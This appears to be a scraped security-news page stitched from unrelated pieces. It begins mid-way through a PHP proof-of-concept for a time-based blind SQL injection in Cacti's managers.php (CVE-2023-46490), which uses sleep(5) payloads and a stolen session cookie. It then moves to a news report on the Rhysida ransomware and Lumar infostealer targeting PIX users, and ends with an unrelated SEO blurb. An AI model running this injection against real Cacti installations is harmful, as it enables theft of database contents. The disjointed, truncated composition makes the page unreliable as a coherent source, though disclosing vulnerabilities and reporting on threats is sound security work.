sleep(5), 0"\]); $injectSQLcode2=serialize(\["1 ) or if ('error' = (SELECT username FROM user\_auth WHERE id = 1 ), sleep(5), 0"\]); $target = "managers.php?action=actions&selected\_items=1&action\_receivers=1&drp\_action=1&selected\_graphs\_array="; function curlPage($url, $cookie=false){ $curl = curl\_init(); curl\_setopt($curl, CURLOPT\_URL, $url); curl\_setopt($curl, CURLOPT\_HEADER, 1); curl\_setopt($curl, CURLOPT\_RETURNTRANSFER, 1); curl\_setopt($curl, CURLOPT\_CONNECTTIMEOUT, 60); curl\_setopt($curl, CURLOPT\_TIMEOUT, 60); if($cookie){ curl\_setopt($curl, CURLOPT\_COOKIE,$cookie); } $data = curl\_exec($curl); echo "\[++Debug++\] ".$url."\\n"; curl\_close($curl); return $data; } function getSQLinjectionPage(){ global $url, $login, $target, $injectSQLcode1, $injectSQLcode2; //login $data1 = curlPage($url.$login); //echo $data1."\\n"; //get cookie $cookie = substr($data1, strpos($data1, 'Set-Cookie: ') + 12, 32); echo '\[++Debug++\] Cacti Cookie: '.$cookie."\\n"; //check login $data2 = curlPage($url."index.php", $cookie); //echo substr($data2, 0, 300)."\\n\\n"; //time of correct test $time1 = time(); $data3 = curlPage($url.$target.urlencode($injectSQLcode1), $cookie); $time1 = time() - $time1; echo "\[++result++\] time of correct test: ".$time1."\\n\\n"; //time of error test $time2 = time(); $data3 = curlPage($url.$target.urlencode($injectSQLcode2), $cookie); $time2 = time() - $time2; echo "\[++result++\] time of error test: ".$time2."\\n\\n"; if( $time2 <=1 and $time1 >= 5){ echo "\[++result++\] Time difference exist, vulnerability exsit!"."\\n\\n"; }else{ echo "\[++result++\] No time difference, vulnerability not exsit"."\\n\\n"; } } //set ip, port, username, password, InjectCode first getSQLinjectionPage(); Impact Although there is no echo，by measuring the time delay of accessing the website, authenticated users can obtain mysql database content.

CVE-2023-46490: CVE-2023-46490

Emerging RaaS operation uses Rhysida ransomware paired with a wicked infostealer called Lumar, researchers warn.

Operating since last May, an emerging ransomware strain called Rhysida was deployed along with new stealer malware called Lumar for a potent new one-two punch against Brazil's popular PIX payment system users.

Researchers from Kaspersky reported Rhysida is functioning as a ransomware-as-a-service (RaaS) operation with a demonstrated ability to quickly evolve.

"It stands out for its unique self-deletion mechanism and compatibility with pre-Windows 10 versions of Microsoft. Written in C++ and compiled with MinGW and shared libraries, Rhysida showcases sophistication in its design," Kaspersky said in its findings about the group. "While relatively new, Rhysida faced initial configuration challenges with its onion server, revealing a group's rapid adaptation and learning curve."

The ransomware campaign targeting PIX has been ongoing since December 2022, the Kaspersky team noted, adding that Rhysida was deployed along with a complimentary malware-as-a-service (MaaS) infostealer called Lumar to target users of the payment system.

Lumar first emerged in July 2023, the report added, and can steal data on Telegram sessions, passwords, cookies, autofill information, desktop files, and even cryptographic wallets.

Notably, the Kaspersky team said the Lumar stealer is compact, without sacrificing functionality.

"The malware's efficient data collection is facilitated by the use of three separate threads," the report added. "The C2, hosted by the malware author as a Malware as a Service (MaaS), provides user-friendly features such as statistics and data logs. Users can download the latest version of Lumar and receive Telegram notifications for incoming data."

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

Meet Rhysida, a New Ransomware Strain That Deletes Itself

By Owais Sultan
Looking for a SaaS SEO consultant? We’ve rounded up the top 15 SaaS SEO experts you need to…
This is a post from HackRead.com Read the original post: 15 Best SaaS SEO Experts That Will Help You Dominate Online

Tag

#c++